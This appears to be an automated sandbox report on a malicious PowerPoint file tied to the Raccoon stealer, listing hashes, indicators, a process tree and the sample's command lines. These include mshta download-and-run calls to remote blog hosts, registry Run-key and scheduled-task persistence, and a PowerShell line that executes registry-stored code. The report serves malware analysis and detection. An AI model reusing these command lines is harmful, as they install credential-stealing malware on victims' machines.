Analysis

max time kernel: 135s
max time network: 136s
platform: windows10_x64
resource: win10v20210410
submitted: 19-04-2021 12:22

Static task: static1
Behavioral task: behavioral1
  Sample: a621e8ce92943201dce4f5965fa4199b.pps
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: a621e8ce92943201dce4f5965fa4199b.pps
  Resource: win10v20210410

General

Target: a621e8ce92943201dce4f5965fa4199b.pps
Size: 62KB
MD5: a621e8ce92943201dce4f5965fa4199b
SHA1: d0c4e4d68327803cce5a31bf1b375faee2a3ebb9
SHA256: 4091dc5f238a7795b1ade8879c2bc7c9ac85ab1f107c2d1c3ac16a8da871ff7d
SHA512: c7a4c42904a5aed4f8a381e3c92f20c9e8c164519b0e194ae4fea49c1de097818540f437ca15e6e875eab6ea93be9eebf9a92895abc8710c96bfb1be972e9107
Malware Config

Extracted
  https://%6786d78asd6786d78asd%6786d78asd%6786d78asd@j.mp/dmaddwwmwdiwdmddwdwnudnwdxx

Extracted
  Family: raccoon
  e4dbb69554a4dcf2a21c14794d523a7e729dc429
  url4cnc: https://telete.in/telehabarik
Signatures

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: mshta.exe, powershell.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 2348 | 2116 | mshta.exe | POWERPNT.EXE
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2380 | 3516 | powershell.exe |

Blocklisted process makes network request (12 IoCs)
Processes: mshta.exe, powershell.exe
  flow | pid | process
  17 | 2348 | mshta.exe
  19 | 2348 | mshta.exe
  21 | 2348 | mshta.exe
  23 | 2348 | mshta.exe
  25 | 2348 | mshta.exe
  33 | 2348 | mshta.exe
  34 | 2348 | mshta.exe
  36 | 2348 | mshta.exe
  38 | 2348 | mshta.exe
  39 | 2348 | mshta.exe
  45 | 2380 | powershell.exe
  47 | 2380 | powershell.exe

Loads dropped DLL (1 IoCs)
Processes: aspnet_compiler.exe
  pid | process
  4300 | aspnet_compiler.exe

Adds Run key to start application (2 TTPs, 6 IoCs)
Processes: mshta.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%1230948@newblogset144.blogspot.com/p/42.html\"" [mshta.exe]
  - Set value (str): \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%1230948@firstblognew123.blogspot.com/p/42.html\"" [mshta.exe]
  - Set value (str): \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%1230948@papagunnakjdnmwdnwmndwm.blogspot.com/p/42.html\"" [mshta.exe]
  - Set value (str): \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)|IEX\"\", 0 : window.close\")" [mshta.exe]
  - Key created: \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run [mshta.exe]
  - Set value (str): \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)|IEX\"\", 0 : window.close\")" [mshta.exe]

Suspicious use of SetThreadContext (1 IoCs)
Processes: powershell.exe
  description | pid | process | target process
  PID 2380 set thread context of 4300 | 2380 | powershell.exe | aspnet_compiler.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (2 IoCs)
Processes: WerFault.exe, WerFault.exe
  pid | pid_target | process | target process
  3848 | 2348 | WerFault.exe | mshta.exe
  4432 | 4300 | WerFault.exe | aspnet_compiler.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: POWERPNT.EXE
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 [POWERPNT.EXE]
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz [POWERPNT.EXE]
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString [POWERPNT.EXE]

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: POWERPNT.EXE
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS [POWERPNT.EXE]
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily [POWERPNT.EXE]
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU [POWERPNT.EXE]

Kills process with taskkill (2 IoCs)
Processes: taskkill.exe, taskkill.exe
  pid | process
  432 | taskkill.exe
  2636 | taskkill.exe

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes: POWERPNT.EXE
  pid | process
  2116 | POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses (45 IoCs)
Processes: powershell.exe, WerFault.exe, WerFault.exe
  pid | process (recorded, in order)
  2380 | powershell.exe (×2)
  3848 | WerFault.exe (×15)
  2380 | powershell.exe (×13)
  4432 | WerFault.exe (×15)

Suspicious use of AdjustPrivilegeToken (49 IoCs)
Processes: powershell.exe, taskkill.exe, taskkill.exe, WerFault.exe, WerFault.exe
  description | pid | process
  Token: SeDebugPrivilege | 2380 | powershell.exe
  Token: SeDebugPrivilege | 432 | taskkill.exe
  Token: SeDebugPrivilege | 2636 | taskkill.exe
  Token: SeDebugPrivilege | 3848 | WerFault.exe
  Token: SeIncreaseQuotaPrivilege | 2380 | powershell.exe (×2)
  Token: SeSecurityPrivilege | 2380 | powershell.exe (×2)
  Token: SeTakeOwnershipPrivilege | 2380 | powershell.exe (×2)
  Token: SeLoadDriverPrivilege | 2380 | powershell.exe (×2)
  Token: SeSystemProfilePrivilege | 2380 | powershell.exe (×2)
  Token: SeSystemtimePrivilege | 2380 | powershell.exe (×2)
  Token: SeProfSingleProcessPrivilege | 2380 | powershell.exe (×2)
  Token: SeIncBasePriorityPrivilege | 2380 | powershell.exe (×2)
  Token: SeCreatePagefilePrivilege | 2380 | powershell.exe (×2)
  Token: SeBackupPrivilege | 2380 | powershell.exe (×2)
  Token: SeRestorePrivilege | 2380 | powershell.exe (×2)
  Token: SeShutdownPrivilege | 2380 | powershell.exe (×2)
  Token: SeDebugPrivilege | 2380 | powershell.exe (×2)
  Token: SeSystemEnvironmentPrivilege | 2380 | powershell.exe (×2)
  Token: SeRemoteShutdownPrivilege | 2380 | powershell.exe (×2)
  Token: SeUndockPrivilege | 2380 | powershell.exe (×2)
  Token: SeManageVolumePrivilege | 2380 | powershell.exe (×2)
  Token: 33 | 2380 | powershell.exe (×2)
  Token: 34 | 2380 | powershell.exe (×2)
  Token: 35 | 2380 | powershell.exe (×2)
  Token: 36 | 2380 | powershell.exe (×2)
  Token: SeRestorePrivilege | 4432 | WerFault.exe
  Token: SeBackupPrivilege | 4432 | WerFault.exe
  Token: SeDebugPrivilege | 4432 | WerFault.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes: POWERPNT.EXE
  pid | process
  2116 | POWERPNT.EXE (×2)

Suspicious use of WriteProcessMemory (35 IoCs)
Processes: POWERPNT.EXE, mshta.exe, powershell.exe
  description | pid | process | target process
  PID 2116 wrote to memory of 2348 | 2116 | POWERPNT.EXE | mshta.exe (×2)
  PID 2348 wrote to memory of 3292 | 2348 | mshta.exe | schtasks.exe (×2)
  PID 2348 wrote to memory of 432 | 2348 | mshta.exe | taskkill.exe (×2)
  PID 2348 wrote to memory of 2636 | 2348 | mshta.exe | taskkill.exe (×2)
  PID 2380 wrote to memory of 4252 | 2380 | powershell.exe | aspnet_compiler.exe (×3)
  PID 2380 wrote to memory of 4260 | 2380 | powershell.exe | aspnet_compiler.exe (×3)
  PID 2380 wrote to memory of 4268 | 2380 | powershell.exe | aspnet_compiler.exe (×3)
  PID 2380 wrote to memory of 4276 | 2380 | powershell.exe | aspnet_compiler.exe (×3)
  PID 2380 wrote to memory of 4284 | 2380 | powershell.exe | aspnet_compiler.exe (×3)
  PID 2380 wrote to memory of 4292 | 2380 | powershell.exe | aspnet_compiler.exe (×3)
  PID 2380 wrote to memory of 4300 | 2380 | powershell.exe | aspnet_compiler.exe (×9)

Processes

Level 1: C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a621e8ce92943201dce4f5965fa4199b.pps" /ou ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\SYSTEM32\mshta.exe
    Command line: "mshta""https://%6786d78asd6786d78asd%6786d78asd%6786d78asd@j.mp/dmaddwwmwdiwdmddwdwnudnwdxx"
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@getyournewblog.blogspot.com/p/42.html""\"", 0 : window.close"\")
      - Creates scheduled task(s)

    Level 3: C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    Level 3: C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im winword.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    Level 3: C:\Windows\system32\WerFault.exe
      Command line: C:\Windows\system32\WerFault.exe -u -p 2348 -s 2464
      - Program crash
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

Level 1: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    (this entry is listed 6 times with the same command line and no flagged signatures)

  Level 2: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    - Loads dropped DLL

    Level 3: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 1544
      - Program crash
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Downloads

\Users\Admin\AppData\LocalLow\sqlite3.dll
  MD5: f964811b68f9f1487c2b41e1aef576ce
  SHA1: b423959793f14b1416bc3b7051bed58a1034025f
  SHA256: 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
  SHA512: 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Memory dumps (path, Filesize where given):
  memory/432-182-0x0000000000000000-mapping.dmp
  memory/2116-114-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmp (64KB)
  memory/2116-115-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmp (64KB)
  memory/2116-116-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmp (64KB)
  memory/2116-117-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmp (64KB)
  memory/2116-119-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmp (64KB)
  memory/2116-118-0x00007FF85AE50000-0x00007FF85CA2D000-memory.dmp (27.9MB)
  memory/2116-122-0x00000164968A0000-0x000001649798E000-memory.dmp (16.9MB)
  memory/2116-123-0x00007FF851AB0000-0x00007FF8539A5000-memory.dmp (31.0MB)
  memory/2116-179-0x00000164A4C50000-0x00000164A4C54000-memory.dmp (16KB)
  memory/2348-180-0x0000000000000000-mapping.dmp
  memory/2380-186-0x0000022062BB6000-0x0000022062BB8000-memory.dmp (8KB)
  memory/2380-184-0x0000022062BB0000-0x0000022062BB2000-memory.dmp (8KB)
  memory/2380-185-0x0000022062BB3000-0x0000022062BB5000-memory.dmp (8KB)
  memory/2380-187-0x0000022062BB8000-0x0000022062BB9000-memory.dmp (4KB)
  memory/2636-183-0x0000000000000000-mapping.dmp
  memory/3292-181-0x0000000000000000-mapping.dmp
  memory/4300-188-0x000000000043DC5B-mapping.dmp
  memory/4300-189-0x0000000000400000-0x0000000000492000-memory.dmp (584KB)